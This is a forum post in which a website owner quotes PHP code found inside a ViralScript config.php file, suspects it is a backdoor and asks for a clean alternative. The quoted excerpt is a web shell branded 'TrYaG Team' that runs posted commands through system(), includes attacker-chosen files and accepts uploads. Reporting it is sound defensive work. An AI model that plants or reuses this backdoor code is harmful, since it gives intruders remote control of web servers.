kirkonpolttaja
Senior Member
- Feb 6, 2010
- 1,030
- 674
Hey all!
I was building my website and was doing some investigating... i ran to one interesting thing...
There was this code (i dont post all of it):
This is found inside ViralScript -> config.php file.
If this is what i think it is (backdoor for the viralscript maker to my site) then can someone refer me a similiar script WITHOUT these goddamn exploits
I was building my website and was doing some investigating... i ran to one interesting thing...
There was this code (i dont post all of it):
Code:
echo "</textarea>";
}
// ERORR //
if(empty($_POST[\'ER\'])){
} else {
$ERORR=$_POST[\'ER\'];
echo error_log("
<html>
<head>
[B]<title> Exploit: error_log() By * TrYaG Team * </title>[/B]
<body bgcolor="#000000">
<table Width=\'100%\' height=\'10%\' bgcolor=\'#8C0404\' border=\'1\'>
<tr>
<td><center><font size=\'6\' color=\'#BBB516\'> [B]By TrYaG Team[/B]</font></center></td>
</tr>
</table>
<font color=\'#FF0000\'>
</head>
<?
if($fileup == ""){
ECHO " reade for up ";
}else{
$path= exec("pwd");
$path .= "/$fileup_name";
$CopyFile = copy($fileup,"$path");
if($CopyFile){
echo " up ok ";
}else{
echo " no up ";
}
}
if(empty($_POST[\'m\'])){
} else {
$m=$_POST[\'m\'];
echo system($m);
}
if(empty($_POST[\'cmd\'])){
} else {
$h= $_POST[\'cmd\'];
print include($h) ;
}
This is found inside ViralScript -> config.php file.
If this is what i think it is (backdoor for the viralscript maker to my site) then can someone refer me a similiar script WITHOUT these goddamn exploits